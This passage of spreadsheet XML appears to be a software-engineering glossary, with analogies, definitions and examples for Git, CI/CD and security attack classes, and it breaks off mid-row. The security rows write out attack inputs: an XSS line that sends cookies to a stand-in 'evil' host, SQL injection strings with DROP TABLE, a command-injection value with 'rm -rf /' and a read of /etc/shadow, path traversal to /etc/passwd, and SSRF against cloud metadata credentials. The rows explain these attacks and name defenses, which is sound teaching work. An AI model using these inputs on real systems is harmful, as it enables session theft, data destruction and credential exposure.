      <c r="G937" t="inlineStr">
        <is>
          <t>Pair programming - review is asynchronous inspection after writing; pairing is synchronous co-writing.</t>
        </is>
      </c>
      <c r="H937" t="inlineStr">
        <is>
          <t>A bouncer reading your diff at the club door.</t>
        </is>
      </c>
      <c r="J937" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K937" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" t="n">
        <v>0</v>
      </c>
      <c r="B938" t="inlineStr">
        <is>
          <t>936</t>
        </is>
      </c>
      <c r="C938" t="inlineStr">
        <is>
          <t>Tags &amp; semantic versioning</t>
        </is>
      </c>
      <c r="D938" t="inlineStr">
        <is>
          <t>Wine cellar bottles labeled 2.4.1: changing the vineyard (breaking) bumps the big number, a new grape blend adds the middle, and recorking a bad bottle bumps the last.</t>
        </is>
      </c>
      <c r="E938" t="inlineStr">
        <is>
          <t>Tags pin names to commits; semver MAJOR.MINOR.PATCH encodes breaking change, new feature, and bug fix respectively.</t>
        </is>
      </c>
      <c r="F938" t="inlineStr">
        <is>
          <t>git tag -a v2.4.1 -m 'fix connection leak' / 2.x -&gt; 3.0.0 breaks the API; 2.4 -&gt; 2.5 adds a feature / git push --tags</t>
        </is>
      </c>
      <c r="G938" t="inlineStr">
        <is>
          <t>Branch - a branch pointer moves as commits arrive; a tag stays nailed to one commit forever.</t>
        </is>
      </c>
      <c r="H938" t="inlineStr">
        <is>
          <t>Milestones carved into the trail.</t>
        </is>
      </c>
      <c r="J938" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K938" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" t="n">
        <v>0</v>
      </c>
      <c r="B939" t="inlineStr">
        <is>
          <t>937</t>
        </is>
      </c>
      <c r="C939" t="inlineStr">
        <is>
          <t>Revert</t>
        </is>
      </c>
      <c r="D939" t="inlineStr">
        <is>
          <t>Rather than tearing the poisoned entry out of the ship's log, the captain writes a new entry: 'administered antidote'. History stays honest; the poison is neutralized.</t>
        </is>
      </c>
      <c r="E939" t="inlineStr">
        <is>
          <t>Creates a new commit applying the inverse of an earlier one, undoing its effect while keeping history intact - safe on shared branches.</t>
        </is>
      </c>
      <c r="F939" t="inlineStr">
        <is>
          <t>git revert abc123 / new commit: Revert 'add cache layer' / history untouched, effect undone</t>
        </is>
      </c>
      <c r="G939" t="inlineStr">
        <is>
          <t>Reset - reset moves the branch pointer and erases history; revert adds forward history that undoes.</t>
        </is>
      </c>
      <c r="H939" t="inlineStr">
        <is>
          <t>Ctrl+Z that also writes a receipt.</t>
        </is>
      </c>
      <c r="J939" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K939" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" t="n">
        <v>0</v>
      </c>
      <c r="B940" t="inlineStr">
        <is>
          <t>938</t>
        </is>
      </c>
      <c r="C940" t="inlineStr">
        <is>
          <t>Reset</t>
        </is>
      </c>
      <c r="D940" t="inlineStr">
        <is>
          <t>A time machine yanks your branch pointer back three days; with --hard, everything since dissolves like an unsaved dream. Never time-travel on a shared timeline.</t>
        </is>
      </c>
      <c r="E940" t="inlineStr">
        <is>
          <t>Moves the branch pointer to another commit: --soft keeps changes staged, --mixed unstages, --hard discards - never on shared history.</t>
        </is>
      </c>
      <c r="F940" t="inlineStr">
        <is>
          <t>git reset --soft HEAD~1 # redo the commit / git reset --hard HEAD~3 # discard the work / rescue lost commits: git reflog</t>
        </is>
      </c>
      <c r="G940" t="inlineStr">
        <is>
          <t>Revert - revert is a safe forward-moving undo commit; reset rewrites where the branch points.</t>
        </is>
      </c>
      <c r="H940" t="inlineStr">
        <is>
          <t>Rewinding the tape and recording over it.</t>
        </is>
      </c>
      <c r="J940" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K940" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" t="n">
        <v>0</v>
      </c>
      <c r="B941" t="inlineStr">
        <is>
          <t>939</t>
        </is>
      </c>
      <c r="C941" t="inlineStr">
        <is>
          <t>Stash</t>
        </is>
      </c>
      <c r="D941" t="inlineStr">
        <is>
          <t>The maitre d' whisks your half-eaten plate into the cloakroom when an urgent guest arrives; handle the emergency, present the ticket (stash pop), and your meal returns untouched.</t>
        </is>
      </c>
      <c r="E941" t="inlineStr">
        <is>
          <t>Shelves uncommitted changes onto a stack and restores a clean working tree; pop them back later exactly as you left them.</t>
        </is>
      </c>
      <c r="F941" t="inlineStr">
        <is>
          <t>git stash push -m 'wip: signup form' / git switch hotfix; fix; git switch - / git stash pop</t>
        </is>
      </c>
      <c r="G941" t="inlineStr">
        <is>
          <t>WIP commit - a stash is local and temporary; a WIP commit enters branch history and can be pushed.</t>
        </is>
      </c>
      <c r="H941" t="inlineStr">
        <is>
          <t>A coat check for half-done work.</t>
        </is>
      </c>
      <c r="J941" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K941" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" t="n">
        <v>0</v>
      </c>
      <c r="B942" t="inlineStr">
        <is>
          <t>940</t>
        </is>
      </c>
      <c r="C942" t="inlineStr">
        <is>
          <t>Continuous integration</t>
        </is>
      </c>
      <c r="D942" t="inlineStr">
        <is>
          <t>Villagers pour each day's milk into the communal vat every evening; hoard yours for a month and the soured bucket no longer mixes in. Integration pain grows with time apart.</t>
        </is>
      </c>
      <c r="E942" t="inlineStr">
        <is>
          <t>Everyone merges small changes into the shared mainline at least daily, with automated build and tests validating each merge.</t>
        </is>
      </c>
      <c r="F942" t="inlineStr">
        <is>
          <t>push -&gt; CI builds and tests in 8 min / branches live hours, not weeks / merge conflicts stay trivial</t>
        </is>
      </c>
      <c r="G942" t="inlineStr">
        <is>
          <t>Having a CI server - the practice is FREQUENT integration; a build server churning month-old branches is not CI.</t>
        </is>
      </c>
      <c r="H942" t="inlineStr">
        <is>
          <t>Small streams merging hourly into the river.</t>
        </is>
      </c>
      <c r="J942" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K942" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" t="n">
        <v>0</v>
      </c>
      <c r="B943" t="inlineStr">
        <is>
          <t>941</t>
        </is>
      </c>
      <c r="C943" t="inlineStr">
        <is>
          <t>Keep the build green</t>
        </is>
      </c>
      <c r="D943" t="inlineStr">
        <is>
          <t>Toyota floor rule: any worker who spots a defect pulls the ANDON cord and the whole line halts until it is fixed - nobody bolts new parts onto a broken chassis.</t>
        </is>
      </c>
      <c r="E943" t="inlineStr">
        <is>
          <t>A broken mainline build stops the line: fixing or reverting it outranks all other work, because everyone builds on top of it.</t>
        </is>
      </c>
      <c r="F943" t="inlineStr">
        <is>
          <t>main goes red 9:14 -&gt; revert lands 9:21 / no new merges while red / build-cop rotation owns the siren</t>
        </is>
      </c>
      <c r="G943" t="inlineStr">
        <is>
          <t>Tolerated 'known red' - a flaky red trains everyone to ignore red; quarantine or fix it like any breakage.</t>
        </is>
      </c>
      <c r="H943" t="inlineStr">
        <is>
          <t>A red traffic light no one is allowed to drive past.</t>
        </is>
      </c>
      <c r="J943" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K943" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" t="n">
        <v>0</v>
      </c>
      <c r="B944" t="inlineStr">
        <is>
          <t>942</t>
        </is>
      </c>
      <c r="C944" t="inlineStr">
        <is>
          <t>Pipeline stages</t>
        </is>
      </c>
      <c r="D944" t="inlineStr">
        <is>
          <t>A bottling conveyor: rinse (lint), fill (build), cap (test), label (package), ship (deploy) - one loose cap and the belt ejects the bottle before it ever gets a label.</t>
        </is>
      </c>
      <c r="E944" t="inlineStr">
        <is>
          <t>CI/CD runs ordered stages - lint, build, unit test, integration, package, deploy - failing fast and cheap before slow and costly.</t>
        </is>
      </c>
      <c r="F944" t="inlineStr">
        <is>
          <t>stages: [lint, build, test, e2e, deploy] / lint fails in 40s -&gt; e2e never runs / artifacts flow from stage to stage</t>
        </is>
      </c>
      <c r="G944" t="inlineStr">
        <is>
          <t>Test pyramid - the pyramid shapes the test suite; stages order the whole path from commit to production.</t>
        </is>
      </c>
      <c r="H944" t="inlineStr">
        <is>
          <t>Airport security checkpoints in strict sequence.</t>
        </is>
      </c>
      <c r="J944" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K944" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" t="n">
        <v>0</v>
      </c>
      <c r="B945" t="inlineStr">
        <is>
          <t>943</t>
        </is>
      </c>
      <c r="C945" t="inlineStr">
        <is>
          <t>Reproducible builds</t>
        </is>
      </c>
      <c r="D945" t="inlineStr">
        <is>
          <t>The recipe pins 'flour, lot #4711': bake it today or in five years, in any kitchen on earth, and a byte-for-byte identical loaf comes out of the oven.</t>
        </is>
      </c>
      <c r="E945" t="inlineStr">
        <is>
          <t>The same source plus pinned, hashed dependencies yields identical artifacts on any machine - no 'works only in CI' drift.</t>
        </is>
      </c>
      <c r="F945" t="inlineStr">
        <is>
          <t>package-lock.json / uv.lock committed / FROM node:20.11.1@sha256:8f3a... / same inputs -&gt; same image digest</t>
        </is>
      </c>
      <c r="G945" t="inlineStr">
        <is>
          <t>Deterministic tests - that is stable test verdicts; reproducible builds are stable artifacts from source.</t>
        </is>
      </c>
      <c r="H945" t="inlineStr">
        <is>
          <t>A 3D printer: same file, same object, anywhere.</t>
        </is>
      </c>
      <c r="J945" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K945" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" t="n">
        <v>0</v>
      </c>
      <c r="B946" t="inlineStr">
        <is>
          <t>944</t>
        </is>
      </c>
      <c r="C946" t="inlineStr">
        <is>
          <t>Environment parity</t>
        </is>
      </c>
      <c r="D946" t="inlineStr">
        <is>
          <t>Rehearse on a cardboard stage, premiere in the opera house - the actor trips on stairs that never existed in rehearsal. 'Works on my machine' is the cardboard stage talking.</t>
        </is>
      </c>
      <c r="E946" t="inlineStr">
        <is>
          <t>Keep dev, staging, and production as similar as possible - OS, versions, services, config shape - so bugs surface before prod.</t>
        </is>
      </c>
      <c r="F946" t="inlineStr">
        <is>
          <t>docker-compose mirrors prod services / staging uses a prod-sized data sample / classic gap: SQLite in dev, Postgres in prod</t>
        </is>
      </c>
      <c r="G946" t="inlineStr">
        <is>
          <t>Reproducible builds - parity aligns runtime environments; reproducibility aligns build outputs.</t>
        </is>
      </c>
      <c r="H946" t="inlineStr">
        <is>
          <t>A flight simulator matching the real cockpit switch for switch.</t>
        </is>
      </c>
      <c r="J946" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K946" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" t="n">
        <v>0</v>
      </c>
      <c r="B947" t="inlineStr">
        <is>
          <t>945</t>
        </is>
      </c>
      <c r="C947" t="inlineStr">
        <is>
          <t>Delivery vs deployment</t>
        </is>
      </c>
      <c r="D947" t="inlineStr">
        <is>
          <t>Delivery keeps a wrapped parcel by the door, ready for a human to press SEND; deployment removes the button - every green parcel walks itself to production.</t>
        </is>
      </c>
      <c r="E947" t="inlineStr">
        <is>
          <t>Continuous delivery keeps every mainline build releasable at the push of a button; continuous deployment removes the button entirely.</t>
        </is>
      </c>
      <c r="F947" t="inlineStr">
        <is>
          <t>delivery: release manager clicks Deploy / deployment: merge -&gt; production in 20 min / both demand an always-releasable trunk</t>
        </is>
      </c>
      <c r="G947" t="inlineStr">
        <is>
          <t>Continuous integration - CI ends at a validated merge; delivery and deployment extend the pipeline to production.</t>
        </is>
      </c>
      <c r="H947" t="inlineStr">
        <is>
          <t>A loaded catapult versus an auto-firing one.</t>
        </is>
      </c>
      <c r="J947" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K947" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" t="n">
        <v>0</v>
      </c>
      <c r="B948" t="inlineStr">
        <is>
          <t>946</t>
        </is>
      </c>
      <c r="C948" t="inlineStr">
        <is>
          <t>Feature flags</t>
        </is>
      </c>
      <c r="D948" t="inlineStr">
        <is>
          <t>The new chandelier is fully wired into the ballroom but its wall switch stays OFF; you flip it for the staff first, then table by table - and flip it back the instant sparks fly.</t>
        </is>
      </c>
      <c r="E948" t="inlineStr">
        <is>
          <t>Runtime switches that decouple deploy from release: ship code dark, enable per user or percentage, kill instantly on trouble.</t>
        </is>
      </c>
      <c r="F948" t="inlineStr">
        <is>
          <t>if flags.on('new_checkout', user): ... / ramp 1% -&gt; 50% -&gt; 100% / kill switch beats a 2 AM redeploy</t>
        </is>
      </c>
      <c r="G948" t="inlineStr">
        <is>
          <t>Config setting - flags are short-lived release levers; delete them after full rollout or they rot into dead branches.</t>
        </is>
      </c>
      <c r="H948" t="inlineStr">
        <is>
          <t>A dimmer switch on every new feature.</t>
        </is>
      </c>
      <c r="J948" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K948" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" t="n">
        <v>0</v>
      </c>
      <c r="B949" t="inlineStr">
        <is>
          <t>947</t>
        </is>
      </c>
      <c r="C949" t="inlineStr">
        <is>
          <t>Blue-green deployment</t>
        </is>
      </c>
      <c r="D949" t="inlineStr">
        <is>
          <t>Two identical restaurants, Blue and Green: diners fill Blue while chefs fully stage Green; flipping one entrance sign moves everyone instantly - and flips back if the soup is off.</t>
        </is>
      </c>
      <c r="E949" t="inlineStr">
        <is>
          <t>Run two identical production environments; deploy to the idle one, then switch all traffic at once - switch back to roll back.</t>
        </is>
      </c>
      <c r="F949" t="inlineStr">
        <is>
          <t>green gets v2, smoke-tested while warm / load balancer flips blue -&gt; green in one cut / rollback = flip the pointer back</t>
        </is>
      </c>
      <c r="G949" t="inlineStr">
        <is>
          <t>Canary release - blue-green flips 100% of traffic at once; canary shifts a small percentage gradually.</t>
        </is>
      </c>
      <c r="H949" t="inlineStr">
        <is>
          <t>Two theater stages rotating one audience.</t>
        </is>
      </c>
      <c r="J949" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K949" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" t="n">
        <v>0</v>
      </c>
      <c r="B950" t="inlineStr">
        <is>
          <t>948</t>
        </is>
      </c>
      <c r="C950" t="inlineStr">
        <is>
          <t>Canary release</t>
        </is>
      </c>
      <c r="D950" t="inlineStr">
        <is>
          <t>Miners lower the canary down the shaft first: route 1% of traffic into the new version and watch the bird's vitals - error rate, latency - before the whole crew descends.</t>
        </is>
      </c>
      <c r="E950" t="inlineStr">
        <is>
          <t>Route a small slice of real traffic to the new version, compare error and latency metrics against the old, then ramp or abort.</t>
        </is>
      </c>
      <c r="F950" t="inlineStr">
        <is>
          <t>5% of pods run v2 for 30 min / p99 and error rate compared to v1 / auto-analysis promotes or rolls back</t>
        </is>
      </c>
      <c r="G950" t="inlineStr">
        <is>
          <t>Feature-flag rollout - a canary varies the deployed BINARY by traffic slice; flags vary a code path inside one binary.</t>
        </is>
      </c>
      <c r="H950" t="inlineStr">
        <is>
          <t>A food taster sampling before the king eats.</t>
        </is>
      </c>
      <c r="J950" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K950" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" t="n">
        <v>0</v>
      </c>
      <c r="B951" t="inlineStr">
        <is>
          <t>949</t>
        </is>
      </c>
      <c r="C951" t="inlineStr">
        <is>
          <t>Rollback</t>
        </is>
      </c>
      <c r="D951" t="inlineStr">
        <is>
          <t>Every deploy wears a ripcord: one yank and you are back under yesterday's parachute in seconds. Teams that practice the pull rarely hit the ground.</t>
        </is>
      </c>
      <c r="E951" t="inlineStr">
        <is>
          <t>A fast, rehearsed path to restore the previous good version when a deploy misbehaves; cheap rollback makes deploys brave.</t>
        </is>
      </c>
      <c r="F951" t="inlineStr">
        <is>
          <t>kubectl rollout undo deploy/api / keep DB migrations backward-compatible / mean time to restore beats live debugging</t>
        </is>
      </c>
      <c r="G951" t="inlineStr">
        <is>
          <t>Git revert - revert undoes a commit in source; rollback restores the previous running artifact in production.</t>
        </is>
      </c>
      <c r="H951" t="inlineStr">
        <is>
          <t>An ejector seat tested on every flight.</t>
        </is>
      </c>
      <c r="J951" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K951" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" t="n">
        <v>0</v>
      </c>
      <c r="B952" t="inlineStr">
        <is>
          <t>950</t>
        </is>
      </c>
      <c r="C952" t="inlineStr">
        <is>
          <t>Threat modeling</t>
        </is>
      </c>
      <c r="D952" t="inlineStr">
        <is>
          <t>Before the vault is even built, the architect walks the blueprints wearing a burglar's mask, listing every window, vent, and bribable guard: what can go wrong, and where.</t>
        </is>
      </c>
      <c r="E952" t="inlineStr">
        <is>
          <t>Systematically ask what you are building, what can go wrong, and what you will do about it - before and while building (e.g. STRIDE).</t>
        </is>
      </c>
      <c r="F952" t="inlineStr">
        <is>
          <t>draw a data-flow diagram of checkout / STRIDE per element: spoofing? tampering? / output: a ranked backlog of mitigations</t>
        </is>
      </c>
      <c r="G952" t="inlineStr">
        <is>
          <t>Penetration testing - pen tests attack the built system; threat modeling finds design flaws before code exists.</t>
        </is>
      </c>
      <c r="H952" t="inlineStr">
        <is>
          <t>Playing chess against your own castle.</t>
        </is>
      </c>
      <c r="J952" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K952" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" t="n">
        <v>0</v>
      </c>
      <c r="B953" t="inlineStr">
        <is>
          <t>951</t>
        </is>
      </c>
      <c r="C953" t="inlineStr">
        <is>
          <t>SQL injection</t>
        </is>
      </c>
      <c r="D953" t="inlineStr">
        <is>
          <t>A visitor signs the guestbook: Bob'); DROP TABLE guests;-- and the naive clerk reads the name aloud as a command - the entire guest list vanishes. Data spoken as code.</t>
        </is>
      </c>
      <c r="E953" t="inlineStr">
        <is>
          <t>Attacker-controlled text concatenated into SQL executes as SQL, reading or destroying data - e.g. input like ' OR 1=1--.</t>
        </is>
      </c>
      <c r="F953" t="inlineStr">
        <is>
          <t>sql = "SELECT * FROM users WHERE name='" + name + "'" / input: x' OR '1'='1 -&gt; returns every row / input: '; DROP TABLE users;-- -&gt; far worse</t>
        </is>
      </c>
      <c r="G953" t="inlineStr">
        <is>
          <t>Command injection - the same concatenation trick aimed at the OS shell; SQLi targets the database's query language.</t>
        </is>
      </c>
      <c r="H953" t="inlineStr">
        <is>
          <t>Little Bobby Tables, the boy whose name dropped the school database.</t>
        </is>
      </c>
      <c r="J953" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K953" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" t="n">
        <v>0</v>
      </c>
      <c r="B954" t="inlineStr">
        <is>
          <t>952</t>
        </is>
      </c>
      <c r="C954" t="inlineStr">
        <is>
          <t>Cross-site scripting (XSS)</t>
        </is>
      </c>
      <c r="D954" t="inlineStr">
        <is>
          <t>Someone scrawls a hypnotic rune on the public comment wall; every visitor who merely READS the page falls under its spell - browsers obey graffiti as if the site itself had spoken.</t>
        </is>
      </c>
      <c r="E954" t="inlineStr">
        <is>
          <t>Attacker-supplied script gets included in a page and runs in victims' browsers with the site's identity, stealing sessions or acting as them.</t>
        </is>
      </c>
      <c r="F954" t="inlineStr">
        <is>
          <t>comment: &lt;script&gt;fetch('//evil?c='+document.cookie)&lt;/script&gt; / rendered unescaped -&gt; every viewer's browser runs it / stored, reflected, and DOM-based variants</t>
        </is>
      </c>
      <c r="G954" t="inlineStr">
        <is>
          <t>CSRF - XSS runs attacker script IN your page; CSRF makes the browser SEND forged requests without running script there.</t>
        </is>
      </c>
      <c r="H954" t="inlineStr">
        <is>
          <t>Cursed graffiti that hypnotizes every reader.</t>
        </is>
      </c>
      <c r="J954" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K954" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" t="n">
        <v>0</v>
      </c>
      <c r="B955" t="inlineStr">
        <is>
          <t>953</t>
        </is>
      </c>
      <c r="C955" t="inlineStr">
        <is>
          <t>Cross-site request forgery (CSRF)</t>
        </is>
      </c>
      <c r="D955" t="inlineStr">
        <is>
          <t>While you are logged into the bank, a shady site slips your browser a pre-stamped envelope; the browser mails it WITH your signet-ring cookie attached, and the bank obeys 'your' order.</t>
        </is>
      </c>
      <c r="E955" t="inlineStr">
        <is>
          <t>A malicious site makes the victim's logged-in browser send a state-changing request; session cookies ride along automatically.</t>
        </is>
      </c>
      <c r="F955" t="inlineStr">
        <is>
          <t>&lt;img src='https://bank/transfer?to=eve&amp;amt=9999'&gt; / victim's session cookie is auto-attached / defense: SameSite cookies + CSRF tokens</t>
        </is>
      </c>
      <c r="G955" t="inlineStr">
        <is>
          <t>XSS - CSRF abuses the browser's automatic cookie-sending; XSS injects and executes script inside the page itself.</t>
        </is>
      </c>
      <c r="H955" t="inlineStr">
        <is>
          <t>A puppeteered browser mailing forged checks.</t>
        </is>
      </c>
      <c r="J955" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K955" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" t="n">
        <v>0</v>
      </c>
      <c r="B956" t="inlineStr">
        <is>
          <t>954</t>
        </is>
      </c>
      <c r="C956" t="inlineStr">
        <is>
          <t>Buffer overflow</t>
        </is>
      </c>
      <c r="D956" t="inlineStr">
        <is>
          <t>Pour twelve letters into an eight-letter mail slot and the extra four punch through the wall into the neighboring slot - where the program's return address was written.</t>
        </is>
      </c>
      <c r="E956" t="inlineStr">
        <is>
          <t>Writing past a fixed-size buffer's end corrupts adjacent memory, classically overwriting the return address to hijack control flow.</t>
        </is>
      </c>
      <c r="F956" t="inlineStr">
        <is>
          <t>char buf[8]; gets(buf); // attacker sends 20 bytes / return address overwritten -&gt; attacker's code runs / mitigations: bounds checks, stack canaries, ASLR</t>
        </is>
      </c>
      <c r="G956" t="inlineStr">
        <is>
          <t>Integer overflow - numeric wraparound in a value; it often CAUSES buffer overflows via bad size math, but corrupts numbers, not memory.</t>
        </is>
      </c>
      <c r="H956" t="inlineStr">
        <is>
          <t>An overfilled bathtub flooding the flat below.</t>
        </is>
      </c>
      <c r="J956" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K956" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" t="n">
        <v>0</v>
      </c>
      <c r="B957" t="inlineStr">
        <is>
          <t>955</t>
        </is>
      </c>
      <c r="C957" t="inlineStr">
        <is>
          <t>Path traversal</t>
        </is>
      </c>
      <c r="D957" t="inlineStr">
        <is>
          <t>A hotel guest asks for 'room ../../master-keys': each dot-dot climbs one floor up and out of the guest wing, until the bellhop politely hands over the manager's safe.</t>
        </is>
      </c>
      <c r="E957" t="inlineStr">
        <is>
          <t>Input like ../../etc/passwd escapes the intended directory when file paths are built from user input, exposing arbitrary files.</t>
        </is>
      </c>
      <c r="F957" t="inlineStr">
        <is>
          <t>GET /download?file=../../../etc/passwd / server happily reads outside its folder / defense: resolve the real path, require it under the base dir</t>
        </is>
      </c>
      <c r="G957" t="inlineStr">
        <is>
          <t>SSRF - traversal escapes a directory on the server's disk; SSRF makes the server fetch attacker-chosen URLs.</t>
        </is>
      </c>
      <c r="H957" t="inlineStr">
        <is>
          <t>A dot-dot rope ladder climbing out of the sandbox.</t>
        </is>
      </c>
      <c r="J957" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K957" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" t="n">
        <v>0</v>
      </c>
      <c r="B958" t="inlineStr">
        <is>
          <t>956</t>
        </is>
      </c>
      <c r="C958" t="inlineStr">
        <is>
          <t>Server-side request forgery (SSRF)</t>
        </is>
      </c>
      <c r="D958" t="inlineStr">
        <is>
          <t>You hand the butler a fetch-me note reading http://169.254.169.254/keys; since the butler lives INSIDE the mansion, doors locked to outsiders swing open for him.</t>
        </is>
      </c>
      <c r="E958" t="inlineStr">
        <is>
          <t>Tricking a server into fetching attacker-chosen URLs, reaching internal services or cloud metadata the attacker cannot touch directly.</t>
        </is>
      </c>
      <c r="F958" t="inlineStr">
        <is>
          <t>POST /fetch?url=http://169.254.169.254/iam/creds / the server's inside position bypasses the firewall / defense: allowlist hosts, block internal IP ranges</t>
        </is>
      </c>
      <c r="G958" t="inlineStr">
        <is>
          <t>CSRF - CSRF forges requests FROM the victim's browser; SSRF forges requests FROM the server itself.</t>
        </is>
      </c>
      <c r="H958" t="inlineStr">
        <is>
          <t>A confused deputy fetching from the master's safe.</t>
        </is>
      </c>
      <c r="J958" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K958" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" t="n">
        <v>0</v>
      </c>
      <c r="B959" t="inlineStr">
        <is>
          <t>957</t>
        </is>
      </c>
      <c r="C959" t="inlineStr">
        <is>
          <t>Command injection</t>
        </is>
      </c>
      <c r="D959" t="inlineStr">
        <is>
          <t>The ping form asks for a hostname; a visitor types 8.8.8.8; rm -rf / and the shell - reading semicolon as 'and then' - cheerfully runs the second errand.</t>
        </is>
      </c>
      <c r="E959" t="inlineStr">
        <is>
          <t>User input concatenated into a shell command lets metacharacters like ; or &amp;&amp; append extra commands the server executes.</t>
        </is>
      </c>
      <c r="F959" t="inlineStr">
        <is>
          <t>os.system('ping ' + host) / host = '8.8.8.8; cat /etc/shadow' / defense: subprocess with an arg list, never shell=True</t>
        </is>
      </c>
      <c r="G959" t="inlineStr">
        <is>
          <t>SQL injection - the same concatenation flaw; only the interpreter differs (OS shell versus database engine).</t>
        </is>
      </c>
      <c r="H959" t="inlineStr">
        <is>
          <t>A semicolon smuggled inside a lunchbox.</t>
        </is>
      </c>
      <c r="J959" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K959" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" t="n">
        <v>0</v>
      </c>
      <c r="B960" t="inlineStr">
        <is>
          <t>958</t>
        </is>
      </c>
      <c r="C960" t="inlineStr">
        <is>
          <t>Supply-chain attack</t>
        </is>
      </c>
      <c r="D960" t="inlineStr">
        <is>
          <t>The baker's flour supplier is bribed upstream; every honest bakery in town now sells poisoned bread. One compromised npm package rides into ten thousand builds.</t>
        </is>
      </c>
      <c r="E960" t="inlineStr">
        <is>
          <t>Compromise a dependency, build tool, or update channel so victims install malicious code through channels they already trust.</t>
        </is>
      </c>
      <c r="F960" t="inlineStr">
        <is>
          <t>typosquat: 'requets' uploaded to PyPI / event-stream: maintainer handoff turned malicious / defense: lockfiles, hash pinning, provenance (SLSA)</t>
        </is>
      </c>
      <c r="G960" t="inlineStr">
        <is>
          <t>Vulnerable dependency - an accidental bug in a package; a supply-chain attack is deliberate upstream compromise.</t>
        </is>
      </c>
      <c r="H960" t="inlineStr">
        <is>
          <t>A trojan horse hidden in the delivery truck.</t>
        </is>
      </c>
      <c r="J960" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K960" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" t="n">
        <v>0</v>
      </c>
      <c r="B961" t="inlineStr">
        <is>
          <t>959</t>
        </is>
      </c>
      <c r="C961" t="inlineStr">
        <is>
          <t>OWASP Top 10</t>
        </is>
      </c>
      <c r="D961" t="inlineStr">
        <is>
